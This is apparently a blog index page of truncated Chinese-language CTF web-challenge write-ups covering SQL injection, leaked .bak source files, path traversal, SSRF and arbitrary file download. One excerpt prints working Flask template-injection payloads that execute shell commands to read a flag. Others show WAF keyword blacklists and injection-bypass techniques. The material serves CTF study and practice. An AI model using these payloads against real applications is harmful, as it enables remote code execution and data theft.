Van

题目打开是登录框，老样子注册登录，查找信息。发现登录后源码中有app.js,打开得 /** * 或许该用 koa-static 来处理静态文件 * 路径该怎么配置？不管了先填个根目录XD */function login() { const username = $("#username").val();//$("#username")为id选择器,获得id为userName的标签,通过.val(),获得这个标签的value的值,赋值给你声明的变量const username const password = $("#password").val(); const token = sessionStorage.getItem("token"); $.post("/api/login", {username, password, authorization:token}) .done(function(data) &# ...

题目打开是登录框，随便登录发现图片在变动。查看源码，发现图片有疑似SQL注入地方image.php?id=3测试一下没什么结果。发现有robots.txt，提示*.php.bak，试试index.php.bak等，最后发现是image.php.bak 得出源码 <?phpinclude "config.php";$id=isset($_GET["id"])?$_GET["id"]:"1";$path=isset($_GET["path"])?$_GET["path"]:"";$id=addslashes($id);$path=addslashes($path);$id=str_replace(array("\\0","%00","\\'","'"),"",$id);$path=str_replace(array(& ...

题目打开就是源码还有ip <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_headers[0]; } echo $_SERVER["REMOTE_ADDR"]; $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); @mkdir($sandbox); @chdir($sandbox); $data = shell_exec("GET " . escapeshellarg($_GET[&q ...

week1根据官方wp来复现，顺便写下当时做的思路 webjs, 在联想浏览器和火狐第二种老是不行，在edge第二种可以。先打断点后操纵人物去对话，然后修改id，再运行，发现属性会增加 Become A Member 携带请求body不⼀定要指定POST的请求⽅式

题目打开没什么信息点，得利用工具arjun查找参数。 网上搜索然后下载，kali运行，找到name参数。 查参数 测试?name=49，回显7个7，是flask，没有过滤。 直接payload /?name={{lipsum.__globals__['os'].popen('cat flag.txt').read()}}?name={% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat flag.txt').read()") }}{% e ...

做题登录页面，尝试注册，然后登录，发现可以上传文件但是限制图片GIF，先上传正常的，发现可以下载和删除。猜测任意文件下载。抓包改filename，试了发现 filename=../../index.php读取源码（删除HTML部分） <?phpsession_start();if (!isset($_SESSION['login'])) { header("Location: login.php"); die();}?><?phpinclude "class.php";$a = new FileList($_SESSION['sandbox']);$a->Name();$a->Size();?> class.php <?phperror_reporting(0);$dbaddr = "127.0.0.1";$dbuser = "root";$dbpass = &q ...

题目 打开是有注册和登录的字样。先随便注册，再登录。 发现三个中二的文段。同时url栏有?title=xxx 点击用户名，发现可以更改密码。那应该是有一个update语句。 这种可能存在注入的是用户名和密码，所以回到注册去试一下。 注册用户名 1' " 回到改密码的地方，发现报错You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1'"" and pwd='c4ca4238a0b923820dcc509a6f75849b'' at line 1猜测语句是select * from users where uname="" and pwd="";双引号闭合。报错注入。过滤空格，括号绕过。username=1"|| ...

代码审计源码 <?phperror_reporting(0);highlight_file(__FILE__);function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{ return $input; }}function waf($input){ if(is_array($input)){ foreach($input as $key=>$output){ $input[$key] = waf($output); }  ...

题目进入就是一个输入框，搜集信息啥也没有。输入之后url会有 ?url= 一般这种就是路径遍历，ssrf，或者文件包含，PHP伪协议php://filter,file://,或者?file=http://127.0.0.1/admin.php等等 试一下路径遍历，发现下载了几个文件，不过仔细看大小不同。用记事本打开，知道与自己的遍历的内容有关。题目可以直接../../../../flag找到 据说是平台环境问题，正式比赛flag不在这里。 用抓包的话，不会下载文件，而是直接可以看出内容 正规解法 我们都知道可以通过/proc/$pid/来获取指定进程的信息，例如内存映射、CPU绑定信息等等。如果某个进程想要获取本进程的系统信息，就可以通过进程的pid来访问/proc/$pid/目录。但是这个方法还需要获取进程pid，在fork、daemon等情况下pid还可能发生变化。为了更方便的获取本进程的信息，linux提供了/ ...

题目打开是 有提交订单，查询，还有修改，还有删除功能。 查看源代码发现提示<!--?file=?--> 那么尝试读取源码php://filter/read=convert.base64-encode/resource=index.php 读取源码 change.php <?phprequire_once "config.php";if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"])){ $msg = ''; $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i'; ...